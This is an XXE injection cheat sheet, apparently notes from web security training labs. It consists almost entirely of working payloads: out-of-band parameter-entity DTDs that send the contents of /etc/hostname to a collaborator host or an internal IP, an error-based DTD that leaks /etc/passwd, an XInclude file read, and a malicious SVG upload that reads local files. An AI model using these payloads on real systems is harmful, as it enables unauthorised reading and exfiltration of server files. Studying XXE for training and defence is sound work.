XML Injection

Data Exfiltration

In collaborator

<!DOCTYPE root [<!ENTITY % test SYSTEM '<https://exploit-0a8800de03604a7680361120014800f5.exploit-server.net/exploit>'>%test;]>

In Exploit Server

<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % nden " <!ENTITY &#x25; dump SYSTEM 'http://cuano2qlqqprvzo1y59242wwdnje75vu.oastify.com/?filter=%file;'>">

%nden;
%dump;

Error Messages DE

In collaborator

<!DOCTYPE root [<!ENTITY % test SYSTEM '<https://exploit-0a18006804d1198084153639014900c1.exploit-server.net/exploit>'>%test;]>

In Exploit Server

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

XInclude

<foo xmlns:xi="<http://www.w3.org/2001/XInclude>">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

Image File Upload

1. Create .svg file

2. put this content in it

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="<http://www.w3.org/2000/svg>" xmlns:xlink="<http://www.w3.org/1999/xlink>" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

3. upload the file and retrieve the content

<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % nden " <!ENTITY &#x25; dump SYSTEM 'http://10.100.13.203/?filter=%file;'>">
%nden;
%dump;